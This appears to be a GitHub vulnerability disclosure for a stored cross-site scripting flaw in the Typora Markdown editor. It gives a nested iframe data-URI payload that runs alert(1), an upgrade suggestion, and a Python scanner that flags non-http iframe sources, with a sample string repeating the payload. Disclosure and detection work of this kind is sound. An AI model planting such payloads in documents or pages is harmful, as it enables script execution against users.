whoisoo6/Stored-xss-vulnerability-exists-in-Typra

Introduction to Typora:

Typora is a Markdown editor and Markdown reader. It lets you write and read documents with a seamless real-time preview and a distraction-free interface. It supports images, tables, code, math, charts, styles and other content types.

Vulnerability description:

Typora Markdown editor versions v1.0.0-v1.7 (and below) have a cross-site scripting (XSS) vulnerability that allows attackers to execute arbitrary code by uploading Markdown files.

Download link:

https://typora.io/releases/all

Reproduction process:

Open Typora, create a new document, and enter the XSS payload:

<iframe src="data:text/<iframe src="data:text/html;charset=utf-8,<script>alert(1)</script>"></iframe>html,<script>alert(1)</script>"></iframe>

Repair suggestions:

Upgrade to a newer version of Typora.
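
A pre-open check for untrusted Markdown files, as an added example that is not part of the original README or of Typora: it flags `<iframe>` elements whose `src` uses any scheme other than `http`/`https`, which covers the `data:` payload above. The allowlist, the function names and the sample document are assumptions made for this illustration.

```python
import re
import sys
from html.parser import HTMLParser

# Assumption: only remote web frames are acceptable in received Markdown.
ALLOWED_SCHEMES = {"http", "https"}
# C0 control characters and spaces are dropped before matching the scheme,
# so padding inside the attribute value does not hide it (over-approximate).
_PADDING = re.compile(r"[\x00-\x20]+")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):")


def url_scheme(value):
    """Return the lowercased scheme of a URL attribute, or None if relative."""
    cleaned = _PADDING.sub("", value or "").lower()
    match = _SCHEME.match(cleaned)
    return match.group(1) if match else None


class FrameFinder(HTMLParser):
    """Collects (line, scheme) for every iframe src outside the allowlist."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names for us.
        if tag != "iframe":
            return
        for name, value in attrs:
            scheme = url_scheme(value) if name == "src" else None
            if scheme is not None and scheme not in ALLOWED_SCHEMES:
                self.findings.append((self.getpos()[0], scheme))


def scan_markdown(text):
    """Scan raw Markdown text (inline HTML included) and return findings."""
    finder = FrameFinder()
    finder.feed(text)
    finder.close()
    return finder.findings


# Constructed sample: one ordinary embed and one frame in the reported form.
SAMPLE = ('# Notes\n\n<iframe src="https://example.com/embed"></iframe>\n\n'
          '<IFRAME SRC=" Data:text/html,<script>alert(1)</script>"></IFRAME>\n')

if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8", errors="replace") as fh:
            for line, scheme in scan_markdown(fh.read()):
                print(f"{path}:{line}: iframe src uses '{scheme}:' scheme")
```

The scan covers the whole file, so a payload that is only quoted inside a code fence is reported as well and needs a manual look.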
